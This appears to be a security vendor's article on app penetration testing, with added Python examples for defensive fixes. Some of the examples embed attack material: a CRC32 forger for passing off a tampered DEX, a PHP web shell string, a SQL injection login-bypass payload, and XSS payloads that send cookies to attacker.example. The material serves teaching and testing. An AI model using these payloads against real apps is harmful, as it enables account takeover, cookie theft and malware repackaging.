
What an APP security penetration test covers: API interfaces, APK/DEX reversing, vulnerability mining and more

2025-03-26 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

More and more apps are being attacked: databases are tampered with, user data held in the app is leaked (mobile numbers, names, passwords), and on many platforms the bank card, top-up channel and aggregated payment interfaces have been modified by attackers, causing heavy financial losses for the operators. Many of these operators come to us at SINE Security, often on the recommendation of existing customers, looking for protection against further attacks. In our ten years of practice at SINESAFE, most website and app compromises have traced back to vulnerabilities in the site's own code, in the server operating system, or in software installed on the server. This article summarizes what an APP penetration test covers and how to keep an app from being attacked; we hope it helps those who need it.

In 2020, APP security penetration testing is increasingly recognised across the industry. Many customers only think of security after they have been attacked, and then look for a penetration testing, website security or network security company to solve the problem; that is a reasonable need, and more and more customers are following this path. Speaking in professional terms, vulnerability detection for an APP splits along two platforms. iOS is currently quite closed and relatively safe; Android is far more open and has many more exploitable weaknesses, so most penetration tests target the Android build. The contents of an APP penetration test are as follows:

API interface security penetration, also called API penetration. HTTPS is no longer limited to large platforms and mall systems; most apps and websites now use HTTPS (SSL/TLS) transport, and since iOS 9 App Transport Security requires HTTPS connections by default. On top of that, many Android and iOS apps add their own encryption, typically AES for the message body combined with RSA for key exchange. In other words, APP communication encryption can be layered: the first layer is HTTPS, the second is an AES-encrypted payload that uses a secret key to protect particularly sensitive fields against eavesdropping. A penetration test therefore also includes reversing the encryption layer: recovering the algorithm and, if possible, the key from the client. A key that ships inside the APK can be extracted and used to decrypt the traffic, so this layer adds little against anyone who has the package.

APK and DEX file security verification. Test whether the package can be decompiled and whether the data and configuration files inside it can be reversed and read. Some customers' apps were decompiled, implanted with a Trojan backdoor, repackaged and put online for users to download, leaving many phones backdoored and even leaking users' platform account passwords. We recommend that customers add integrity verification of the APK and DEX package, for example an MD5 or CRC32 check of the DEX. Note the limits of such a check: CRC32 and MD5 detect accidental corruption, not a deliberate attacker, who controls the repackaged binary and can recompute the stored value or remove the check itself. The stronger protection is to verify the APK's signing certificate at runtime and on the server side, and to treat the client-side checksum as one layer of reinforcement rather than the defence.
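A CRC32 "signature" of the kind mentioned above is easy to defeat, because CRC32 is linear: for any file and any target value there are four trailing bytes that make the checksum come out to the target. The script below is an added example, not part of the original article: it forges those four bytes with the standard zlib CRC32 table so that a tampered stand-in for classes.dex reports the original's checksum. The sample bytes are constructed for the demonstration. A real DEX also carries its own file-size and Adler-32 header fields, which a repackager would update as well; the point is that a checksum the attacker can recompute is not a signature.

```python
"""Why a CRC32 'signature' on an APK/DEX does not stop repackaging.

Added example (not from the original article). For any data and any target
value, four appended bytes force zlib.crc32 to the target, so an attacker who
has modified a file can restore the original CRC32 in microseconds.
"""
import zlib

_POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zlib and ZIP


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ _POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _make_table()
# The high byte of each table entry is unique, so the table can be inverted
# from the high byte alone; that is what makes the backward walk possible.
_REV = {entry >> 24: i for i, entry in enumerate(_TABLE)}


def crc32_of(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_suffix(data, target_crc):
    """Return 4 bytes s such that zlib.crc32(data + s) == target_crc."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # raw shift register after `data`
    want = target_crc ^ 0xFFFFFFFF        # register value we must end in
    # Backward walk from `want`: each step recovers the table index the byte
    # update must have used, needing only the top byte of the next register.
    idx = [0] * 4
    r = want
    for k in range(3, -1, -1):
        idx[k] = _REV[r >> 24]
        r = ((r ^ _TABLE[idx[k]]) << 8) & 0xFFFFFFFF
    # Forward walk from the real register: pick each byte so that the
    # standard byte update  reg = T[(reg ^ b) & 0xFF] ^ (reg >> 8)  uses idx[k].
    out = bytearray()
    for k in range(4):
        out.append((reg ^ idx[k]) & 0xFF)
        reg = _TABLE[idx[k]] ^ (reg >> 8)
    return bytes(out)


def repackage_keeping_crc(original, tampered):
    """Attacker's step: make `tampered` report the same CRC32 as `original`."""
    return tampered + forge_suffix(tampered, crc32_of(original))


def crc_check_passes(original, candidate):
    """The app's naive integrity check: compare CRC32 against the shipped value."""
    return crc32_of(candidate) == crc32_of(original)


# Constructed sample: a stand-in for classes.dex and a backdoored copy of it.
ORIGINAL_DEX = b"dex\n035\x00" + b"Lcom/example/app/LoginActivity;" + b"\x00" * 16
TAMPERED_DEX = ORIGINAL_DEX.replace(b"LoginActivity", b"Trojan_Login_")

if __name__ == "__main__":
    fixed = repackage_keeping_crc(ORIGINAL_DEX, TAMPERED_DEX)
    print("original CRC32:   %08x" % crc32_of(ORIGINAL_DEX))
    print("tampered CRC32:   %08x" % crc32_of(TAMPERED_DEX))
    print("after 4-byte fix: %08x  check passes: %s"
          % (crc32_of(fixed), crc_check_passes(ORIGINAL_DEX, fixed)))
```

The same idea applies to any linear checksum (Adler-32 included); MD5 is not linear, but it is collision-broken and, more to the point here, the expected value and the comparison both live in a binary the attacker can edit.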

Another item is anti-dynamic-injection testing: detection of dynamic process calls and code injection into the APP. The tester checks whether request packets can be injected or tampered with, including POST data. In our security reinforcement we normally build a process check into the APP that looks for hook frameworks and malicious software on the device and closes the APP if any is found, and likewise detects access through an IP proxy and closes the APP in that case.

Next comes the security penetration test of the website code embedded in most apps. Most mobile Internet apps today are delivered in web mode, which means an APP penetration test also includes a website penetration test. The service covers the following:

Privilege escalation (overstepping) vulnerabilities: check whether functions in the APP platform allow unauthorised operations such as viewing or editing other users' information, for example an ordinary user exercising administrator privileges to read any user's details (contact information, mobile number, bank card) or changing another account's avatar.

File upload vulnerabilities: check the avatar upload and the image upload in message feedback for file-type validation that can be bypassed, allowing PHP, Java, JSP, WAR and other web shell files to be uploaded into the APP's web directory.
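The validation an upload endpoint needs in order to fail the test above, as an added example that is not the article's code: an extension allow-list, content sniffing by magic bytes, agreement between the two, and a server-generated stored name so the client's filename (path components, a double extension such as shell.php.jpg, a null byte) never reaches the web root. The limits, the sample PNG header and the PHP web shell are constructed for the example.

```python
"""File-type validation for an avatar / feedback-image upload. Added example,
not the article's code.
"""
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_BYTES = 2 * 1024 * 1024   # illustrative limit


class UploadRejected(ValueError):
    pass


def sniff_image_type(data):
    """Image type from the leading bytes, or None if they match no known image."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename, data):
    """Return the name to store the file under, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    if "\x00" in filename:
        raise UploadRejected("null byte in filename")
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path part
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed: %r" % ext)
    if ext == "jpeg":
        ext = "jpg"
    kind = sniff_image_type(data)
    if kind is None:
        raise UploadRejected("content is not a supported image")
    if kind != ext:
        raise UploadRejected("extension %s does not match content %s" % (ext, kind))
    # The stored name is chosen by the server: no path, no second extension,
    # so 'shell.php.png' with real PNG content becomes '<hex>.png'.
    return "%s.%s" % (secrets.token_hex(16), kind)


def is_accepted(filename, data):
    """Tester's yes/no view of one upload attempt."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


# Constructed samples: a minimal PNG header and a PHP web shell.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    for name, body in (("me.png", PNG_BYTES), ("shell.php", PHP_SHELL),
                       ("shell.php.jpg", PHP_SHELL), ("avatar.gif", PNG_BYTES)):
        print("%-16s accepted=%s" % (name, is_accepted(name, body)))
```

Serving the upload directory with script execution disabled and with the stored files' real content type is the second half of the fix; validation alone does not make a writable web root safe.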

SMS abuse vulnerabilities: at registration, password recovery, setting a secondary password, changing a bank card and other sensitive operations that send an SMS verification code, test whether codes can be sent repeatedly without limit, whether there is no per-minute cap on sends, and whether the code itself can be brute-forced through unlimited verification attempts.
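The server-side limits a tester probes for in the SMS functions above, as an added example that is not the article's code: an in-memory service with a per-number cooldown, per-number and per-IP hourly caps, a code lifetime and a cap on wrong guesses. The class, the limits and the phone numbers are illustrative assumptions, and the clock is injected so the behaviour can be exercised without waiting.

```python
"""SMS verification-code limits. Added example (not the article's code)."""
import hmac
import secrets
from collections import defaultdict, deque


class FakeClock:
    """Stand-in for time.time() so the limiter can be driven deterministically."""
    def __init__(self, start=0.0):
        self.t = start

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


class SmsCodeService:
    COOLDOWN_S = 60            # at most one code per number per minute
    PER_NUMBER_HOURLY = 5      # ...and five per number per hour
    PER_IP_HOURLY = 20         # one client may not spray codes at many numbers
    CODE_TTL_S = 300           # a code is valid for five minutes
    MAX_VERIFY_ATTEMPTS = 5    # after five wrong guesses the code is burned

    def __init__(self, now):
        self._now = now                    # callable returning seconds
        self._sends = defaultdict(deque)   # (kind, key) -> send timestamps
        self._codes = {}                   # phone -> [code, issued_at, attempts]
        self.outbox = []                   # stands in for the SMS gateway

    def _recent(self, key, window_s):
        """Timestamps for `key` inside the window, dropping expired ones."""
        q = self._sends[key]
        cutoff = self._now() - window_s
        while q and q[0] <= cutoff:
            q.popleft()
        return q

    def request_code(self, phone, client_ip):
        """Return (ok, reason). The code goes to the gateway, never to the caller."""
        now = self._now()
        per_number = self._recent(("num", phone), 3600)
        per_ip = self._recent(("ip", client_ip), 3600)
        if per_number and now - per_number[-1] < self.COOLDOWN_S:
            return False, "cooldown"
        if len(per_number) >= self.PER_NUMBER_HOURLY:
            return False, "number_hourly_cap"
        if len(per_ip) >= self.PER_IP_HOURLY:
            return False, "ip_hourly_cap"
        code = "%06d" % secrets.randbelow(10 ** 6)
        self._codes[phone] = [code, now, 0]   # a new code replaces any older one
        per_number.append(now)
        per_ip.append(now)
        self.outbox.append((phone, code))
        return True, "sent"

    def verify(self, phone, submitted):
        """True only for the current, unexpired code, within the guess budget."""
        entry = self._codes.get(phone)
        if entry is None:
            return False
        code, issued_at, attempts = entry
        if self._now() - issued_at > self.CODE_TTL_S or attempts >= self.MAX_VERIFY_ATTEMPTS:
            del self._codes[phone]
            return False
        entry[2] += 1
        if hmac.compare_digest(code.encode(), str(submitted).encode()):
            del self._codes[phone]             # single use
            return True
        return False


if __name__ == "__main__":
    clock = FakeClock(1000.0)
    svc = SmsCodeService(clock)
    print(svc.request_code("13800000000", "203.0.113.5"))   # (True, 'sent')
    print(svc.request_code("13800000000", "203.0.113.5"))   # (False, 'cooldown')
```

The guess cap matters as much as the send cap: a six-digit code with no attempt limit falls to a million requests, and a code that never expires can be guessed at leisure.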

SQL injection vulnerabilities: in the user login, top-up, bank card change, message feedback, product purchase and withdrawal functions, test whether malicious SQL can be injected through the APP and reach the back-end database, where it would be executed as a query, write or delete.
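The login case from the list above, as an added example that is not the article's code: the same lookup written two ways against an in-memory SQLite database with a constructed users table, and the tester's payload that separates the two. The table, accounts and payload are assumptions for the demonstration.

```python
"""SQL injection in a login handler. Added example (not the article's code)."""
import hashlib
import sqlite3


def _pw_hash(password):
    # Illustration only: production password storage needs a slow, salted hash.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "pw_hash TEXT, role TEXT)"
    )
    for name, pw, role in (("admin", "N0t-a-w3ak-pw!", "admin"),
                           ("alice", "alice-pass", "user")):
        db.execute("INSERT INTO users (username, pw_hash, role) VALUES (?, ?, ?)",
                   (name, _pw_hash(pw), role))
    return db


def login_vulnerable(db, username, password):
    """Splices the username into the SQL text: the classic injection bug."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' "
           "AND pw_hash = '%s'" % (username, _pw_hash(password)))
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Same query with bound parameters: input can never change the SQL structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (username, _pw_hash(password))).fetchone()


# Constructed tester payload. It closes the string literal and adds an OR
# clause; the password check stays attached to a condition that is always
# false, so the resulting WHERE reads:
#   username = '' OR username = 'admin' OR '1' = '2' AND pw_hash = '...'
BYPASS_PAYLOAD = "' OR username = 'admin' OR '1' = '2"


def injectable(login_fn, db):
    """Tester's check: does the payload log in without knowing the password?"""
    return login_fn(db, BYPASS_PAYLOAD, "not-the-password") is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", injectable(login_vulnerable, db))
    print("parameterised handler injectable:", injectable(login_safe, db))
```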

Sensitive information disclosure vulnerabilities: some apps do not protect the data returned by a request, so the response carries user information, account numbers and even passwords in plain text, and by changing the ID value in the request any member's information can be read.
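The ID-tampering finding here and the overstepping finding listed earlier are the same bug, missing object-level authorization, so one added example (not the article's code) covers both: an in-memory profile store, a handler that trusts the id in the request, a handler that checks who is asking, and the enumeration a tester runs against each. The records, field names and roles are constructed for the example.

```python
"""Broken object-level authorization. Added example (not the article's code)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str   # "user" or "admin"


# Constructed records; pw_hash stands in for any field that must never leave the server.
PROFILES = {
    1: {"id": 1, "name": "Admin", "phone": "13800000001", "bank_card": "6222 **** **** 0001", "pw_hash": "a1"},
    2: {"id": 2, "name": "Alice", "phone": "13800000002", "bank_card": "6222 **** **** 0002", "pw_hash": "b2"},
    3: {"id": 3, "name": "Bob", "phone": "13800000003", "bank_card": "6222 **** **** 0003", "pw_hash": "c3"},
}
PUBLIC_FIELDS = ("id", "name")
PRIVATE_FIELDS = ("phone", "bank_card")      # owner or admin only
NEVER_RETURNED = ("pw_hash",)                # stays on the server


def get_profile_vulnerable(caller, profile_id):
    """Authenticated is treated as authorized: any logged-in user reads any id."""
    row = PROFILES.get(profile_id)
    return dict(row) if row else None


def get_profile_safe(caller, profile_id):
    """The field set depends on who is asking; secrets are never serialized."""
    row = PROFILES.get(profile_id)
    if row is None:
        return None
    if caller.role == "admin" or caller.id == profile_id:
        fields = PUBLIC_FIELDS + PRIVATE_FIELDS
    else:
        fields = PUBLIC_FIELDS
    return {k: row[k] for k in fields}


def probe_idor(handler, caller, id_range):
    """Tester's view: ids whose private fields `caller` gets back without owning them."""
    sensitive = PRIVATE_FIELDS + NEVER_RETURNED
    leaked = []
    for pid in id_range:
        out = handler(caller, pid)
        if out and pid != caller.id and any(f in out for f in sensitive):
            leaked.append(pid)
    return leaked


if __name__ == "__main__":
    alice = User(2, "user")
    print("vulnerable handler leaks ids:", probe_idor(get_profile_vulnerable, alice, range(1, 5)))
    print("safe handler leaks ids:     ", probe_idor(get_profile_safe, alice, range(1, 5)))
```

Sequential numeric ids make the enumeration trivial, but replacing them with random ids only raises the cost of guessing; the authorization check is what closes the finding.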

XSS cross-site scripting vulnerabilities: some apps' feedback and avatar upload address functions accept XSS payloads; when a back-office administrator views the message the script runs, and the back-office login address and cookies are sent to the attacker (a session cookie set without the HttpOnly flag is readable by injected script).
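The two injection points named above behave differently, which this added example (not the article's code) shows: the feedback text only needs HTML escaping, but the avatar address ends up inside an src attribute, where escaping alone does not stop a javascript: URL, so it is also validated by scheme. The payloads, the placeholder avatar path and the CDN URL are constructed for the example.

```python
"""Stored XSS through a feedback message and an avatar URL. Added example,
not the article's code.
"""
import html
from urllib.parse import urlparse

ALLOWED_URL_SCHEMES = ("http", "https")
DEFAULT_AVATAR = "/static/default-avatar.png"   # hypothetical placeholder path


def render_vulnerable(message, avatar_url):
    """Direct interpolation: whatever the user submitted becomes markup."""
    return '<img src="%s"><p>%s</p>' % (avatar_url, message)


def safe_url(url):
    """Return the escaped URL if it is absolute http(s); otherwise a safe default."""
    url = url.strip()
    parsed = urlparse(url)
    if parsed.scheme.lower() in ALLOWED_URL_SCHEMES and parsed.netloc:
        return html.escape(url, quote=True)   # quote=True also escapes " and '
    return DEFAULT_AVATAR


def render_safe(message, avatar_url):
    """Escape for the element body; validate and escape for the attribute."""
    return '<img src="%s"><p>%s</p>' % (safe_url(avatar_url),
                                        html.escape(message, quote=True))


# Constructed payloads of the kind a tester submits through the feedback form.
PAYLOAD_TEXT = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
PAYLOAD_URL_SCHEME = 'javascript:fetch("http://attacker.example/?c="+document.cookie)'
PAYLOAD_URL_BREAKOUT = 'x" onerror="alert(document.cookie)'
GOOD_URL = "https://cdn.example/avatars/42.png?v=1&s=64"

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_TEXT, PAYLOAD_URL_BREAKOUT))
    print(render_safe(PAYLOAD_TEXT, PAYLOAD_URL_BREAKOUT))
```

Output encoding is per context: the escaping that is right for element text is not sufficient for a URL attribute, an inline event handler or a script block, and a server-side template engine with auto-escaping plus a Content-Security-Policy header are the production versions of what the two small functions do here.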

Weak password vulnerabilities: the server's root password, the Redis password and the website back-office administrator password may all be weak, for example 123456, admin or admin8888; this also needs to be covered by the penetration test.

The above is roughly what an APP penetration test service consists of. When SINE Security carries out a penetration test for a customer, we test each of the items above. Vulnerability detection helps customers find their weaknesses and avoid heavy financial losses later. Security is never absolute; we can only do our best to maximise it, and only by genuinely understanding our own APP and the vulnerabilities it has can we secure it. If your APP has been attacked and you do not know how to handle it, you can turn to our SINE Security penetration testing service to locate the vulnerability the attack came through, fix it, and reinforce and protect the APP against later attacks so that the loss is kept to a minimum.


© 2024 shulou.com SLNews company. All rights reserved.
